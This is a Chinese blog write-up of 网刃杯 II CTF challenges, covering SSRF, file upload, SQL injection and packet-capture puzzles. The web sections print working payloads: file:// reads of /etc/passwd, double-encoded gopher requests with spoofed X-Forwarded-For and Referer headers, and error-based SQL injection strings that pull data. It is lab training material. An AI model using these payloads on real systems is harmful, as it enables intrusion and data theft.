[CTF]-网刃杯Ⅱ复现

最新推荐文章于 2024-02-23 16:17:54 发布
最新推荐文章于 2024-02-23 16:17:54 发布
阅读量559 收藏 1
点赞数 1
分类专栏: CTF 文章标签: web安全 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/noob0208/article/details/124917287
版权

网刃杯Ⅱ复现

ssrf_sign_in

ssrf题目 使用Goper协议
在这里插入图片描述

可以读文件

?url=file:///etc/passwd

在这里插入图片描述

翻一下arp记录,看看其他web服务

在这里插入图片描述
发现内网ip

172.73.23.100

然后使用gopher协议post传参

现在bp里修改传入的参数

在这里插入图片描述

然后进行url编码,然后把%0A换成%0D%0A,在进行url编码

因为在传参的时候Gopher会解码一次,然后GET再解码一次

POST%2520/?a=1%2520HTTP/1.1%250D%250AHost:172.73.23.100%250D%250AContent-Type:%2520application/x-www-form-urlencoded%250D%250AContent-Length:%25203%250D%250A%250D%250Ab=2

在这里插入图片描述

提示要本地访问,加XFF头

POST /?a=1 HTTP/1.1
Host:172.73.23.100
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
X-Forwarded-For:127.0.0.1

b=2

在进行转码 替换 二次转码

POST%2520%252F%253Fa%253D1%2520HTTP%252F1.1%250D%250AHost%253A172.73.23.100%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%25203%250D%250AX-Forwarded-For%253A127.0.0.1%250D%250A%250D%250Ab%253D2

在这里插入图片描述

提示要从bolean.club访问
添加Referer字段

POST /?a=1 HTTP/1.1
Host:172.73.23.100
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
X-Forwarded-For:127.0.0.1
Referer:bolean.club

b=2

然后在进行编码 替换 二次转码

POST%2520/?a=1%2520HTTP/1.1%250D%250AHost:172.73.23.100%250D%250AContent-Type:%2520application/x-www-form-urlencoded%250D%250AContent-Length:%25203%250D%250AX-FORWARDED-FOR:%2520127.0.0.1%250D%250AReferer:bolean.club%250D%250A%250D%250Ab=2

在这里插入图片描述

upload

文件上传,首先传一个一句话木马

在这里插入图片描述

提示需要ctf类型的文件
修改文件类型为ctf

在这里插入图片描述

显示成功上传,但是不解析文件,尝试其他方法,题目描述中存在sql描述

尝试sql注入

文件名出存在sql注入

尝试报错注入

id='and(select extractvalue(1,concat('~',(select database()))))#

在这里插入图片描述

提示语句错误

这里要在 # 前面加一个)

'and(select extractvalue(1,concat('~',(select database())))))#
或者
'and(select extractvalue(1,concat('~',(select database())))) and '

尝试直接读取flag

'and(select extractvalue(1,concat('~',(select flag from flag)))))#

在这里插入图片描述

只能看到flag的前几位,读取后几位

'and(select extractvalue(1,concat('~',substr((select flag from flag),29,60)))))#

在这里插入图片描述

easyisc

wireshark打开追踪TCP

在这里插入图片描述

xyp07

在这里插入图片描述

解压密码在压缩包注释中

密码:Xyp77&7&77

wireshark打开

在这里插入图片描述

在这里插入图片描述

使用base91解码

iPE=e>we,9:={]RnBjf<7_8Cw1b

flag{welcome_S7_world_xyp07}

移动的黑客

010打开文件头异常

在这里插入图片描述

修改前四位内容

FF FF FF FF -> 0A 0D 0D 0A

打开之后找转速大于1000的内容
因为1000十六进制2710
所以找大于2710的数据包

在这里插入图片描述

68156处找到data数据大于2710的数据

hex(2766)=10086

所以flag

flag{1008668156}

ncsubj

打开数据包进行分析查看,追踪TCP流发现了三段疑似Base64字符串
在这里插入图片描述
在这里插入图片描述

anx1fG58Z3xufGF8cHxmfGh8b3x3fHJ8cHxnfA==

在这里插入图片描述

j|u|n|g|n|a|p|f|h|o|w|r|p|g|

使用随波逐流解码

在这里插入图片描述

rot13加密

w|h|a|t|a|n|c|s|u|b|j|e|c|t|

flag{whatancsubject}

carefulguy

打开数据包进行分析查看,追踪TCP流发现了该位置一直存在数字,疑似16进制,将其每个流的摘取出 来排除其中is a flag@那一部分

在这里插入图片描述
在这里插入图片描述

666c61677b7034757333313576337279316e7433726573746963397d

在这里插入图片描述

flag{p4us315v3ry1nt3restic9}

总结

以上就是对网刃杯Ⅱ的部分复现,
相比于网刃杯Ⅰ ,第二届的题目质量有很大的提升,ctfer的质量也有不同程度的提高,
最后就是还是很菜啊,
继续加油。

木拖把
关注
专栏目录
bilibili2021CTF-安全挑战赛-reverse-复现
ookami6497的博客
10-27 1223
哔哩哔哩安全挑战赛逆向复现第一题第二题 第一题 第一题逆向很简单,用JEB打开,点开com包,找到主函数按tab查看伪代码,加密代码很简单,一个简单的异或就行。 将v2和v1 转成字符得到两串base64加密后的密文 v2 = NjI1OzA3YGAuNjNmNzc7YmU= v1 = YWBlOmZnNjAuOmJmNzAxO2Y= base64解码后得到 v2 = 625;07``.63f77;be v1 = a`e:fg60.:bf701;f 然后搞个脚本就行,脚本如下:
[CTF]-PatriotCTF2022复现
Mr.木Mu
05-27 1374
PatriotCTF2022复现前言MiscApplesIt's All Greek to MeCryptoBarryBase64 Times 10No Postcode EnvyThe OrderTwoFiftyForensicsBannerBézierExfilFlexiSession SpyWebBoot_it_and_root_itChewy or CrunchyCurly FryInspectorClouseauLockedNot So SecretspongebobRock and Roll总结
[CTF]-HECTF2021部分复现
Mr.木Mu
05-23 1244
HECTF2021部分复现MISC快来公众号yaJamesHarden捉迷藏迷途的狗狗snakeCRYPTO签到encodeRSA_e_nre_rsaLittleRSAWebmmmmd5d5d5d5EDGnb(签到)时光塔的宝藏ez_pyLFI_RCE反序列化总结 MISC 快来公众号ya 关注公众号回复即可 JamesHarden 拖到010 PK开头 修改拓展名.rar 解压文件拖进010发现变异flag URPGS{Jr1p0zr_G0_U3pg6_!} 凯撒解密 位移13 HECTF{We1
CTF工控工业互联网(ISC)复现总结WP(超详细)
Aluxian_的博客
12-07 3756
工控领域的TCP协议,有时wireshark会将response包解析为tcp协议,影响做题,如果筛选mms时出现连续request包,考虑wireshark解析错误,将筛选条件删除手动看一下。我们在SCADA 工程中写入了flag字段,请获取该工程flag,flag形式为 flag{}。工业网络中存在异常,尝试通过分析PCAP流量包,分析出流量数据中的异常点,并拿到FLAG。格式为 flag{}某10段工控网络中,工业协议中存在异常数据。2019-工业信息安全技能大赛-深圳站-工业协议分析1。
CTF赛题下载、复现、解题方法
renxq097的博客
04-07 3834
CTF赛题下载、复现、解题方法 看过这篇文章,你将学会自己搭建大佬们在github中分享的赛题进行复现 我们以靶场其中的(web_gift)进行复现 一、操作系统准备 你需要一个linux操作系统并完成docker搭建。 系统:ubuntu 安装网上教程一大堆,这里推荐一个: https://www.cnblogs.com/liujiaxin2018/p/14207930.html 二、ubuntu搭建docker环境 网上搭建docker一堆坑,对新手很不友好,建议看官网的最新命令 更
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-all-in-one
01-30
ctf-all-in-one
CTF-Tools-v1.3.7.zip
01-29
CTF常用工具集
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
2021第一届网刃杯网络安全大赛.zip
09-13
2021第一届网刃杯网络安全大赛.zip
2022网刃杯CTF - REVERSE - squid
qq_41988448的博客
04-25 406
2022网刃杯CTF - REVERSE - squid附件下载一、信息搜集1. 基本信息2. 字符串信息3. 运行3.1 第一次运行3.2 第二次运行3.3 第三次运行二、解题思路1. 解包2. 修复pyc文件头3. pyc反编译4. 分析PYZ-00.pyz参考资料 附件下载 squid 密码: ubgs 一、信息搜集 1. 基本信息 2. 字符串信息 根据字符串信息,初步可以判断是pyinstaller打包的ELF程序。 3. 运行 注意:运行时千万不要和其他文件放在同一个文件夹!!! 注意:运行
近段时间参加的CTF竞赛部分题目复现(ISCC2020 、GKCTF、网鼎杯)
m0re's blog
05-29 2378
本文目录前言Misc签到题 前言 Misc 签到题 打开文件,一张png图片,在010Editor或winhex打开,找到修改高度就得到了flag, 但是flag不是对的,然后想着肯定加密了,所以就去挨个试试,然后发现时维吉尼亚密码,密钥就是high,解密就得到flag。 ...
Ubantu下部署LAMP以及复现一道CTF题目
0verWatch的博客
03-11 635
前言 今天下午用虚拟机在Windows装配服务器。。觉得用类似phpstudy的傻瓜包太简单了,但是对比之下,Linux就值得好好记录一番了,本人渣渣,请勿喷。。。 正文 通过这一次部署学会了如何搭建LAMP,还顺便还原一道CTF反序列化题目。。。 同时感谢大饼的服务器,虽然搞到后面装PHP的时候可能把他服务器有些东西搞坏了,所以我还是用自己的虚拟机模拟一遍吧,毕竟我是个新手,命令行+...
Digital Overdose 2021 Autumn CTF 部分题目赛后复现
Nancy523的博客
10-11 1050
。。。属实蚌埠住了 国内科技公司支持,中东人主办的日本比赛。。osint真的有点 一言难尽跟土澳的比赛对比起来差太多了 官网比赛地址 OSINT: Tour de Japan 看标题 描述应该是围绕这立本来的,,但是结果几乎90%是在Tokyo可还行 1 - Dare enter the mirror world 题目描述: 平平无奇,问了图片拍摄地址 直接yandex识图: 点进第一个链接 往下翻: 题目要求flag2 words DO{Tokyu_Plaza} 2 - The land of
*CTF2021部分复现
SopRomeo的博客
01-20 1445
web oh-my-note 从源码可以看出session 是经过两次随机进行设置,首先随机取得user_id,在通过user_id和提交的时间取得note_id 看到 view路由 可以发现我们可以通过这个公开页面获得note_id 网页中恰好也给到了admin 的note_id 而我们发现在my_notes 这个路由我们有两种方式看到提交的note 一种session,另一种是GET请求发送user_id 很明显,题目意思要求爆破user_id 创建用户和提交时间可能存在几毫秒的偏差 源码中采
2023蓝帽杯CTFweb题LovePHP(复现)
m0_63138919的博客
08-30 518
本文为2023蓝帽杯ctf lovephp复现解题思路
CTF练习2(比赛复现为主)
最新发布
qq_44640313的博客
02-23 1423
CTF练习2(比赛复现为主)
CTF Reverse逆向学习之SMC动态代码加密技术,题目复现(NSSCTF)([网鼎杯 2020 青龙组]jocker)
Sciurdae的博客
10-09 2515
SMC,即Self Modifying Code,动态代码加密技术,指通过修改代码或数据,阻止别人直接静态分析,然后在动态运行程序时对代码进行解密,达到程序正常运行的效果。SMC的实现方式有很多种,可以通过修改PE文件的Section Header、使用API Hook实现代码加密和解密、使用VMProtect等第三方加密工具等。
利用Volatility进行内存取证:CTF-陇剑杯实战指南
在"CTF-陇剑杯之内存分析-虚拟机内存取证1"这篇文章中,主要介绍了如何使用内存取证工具Volatility进行虚拟机内存分析。Volatility是一个开源的内存取证框架,它特别适用于分析内存镜像,帮助用户深入理解系统运行时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值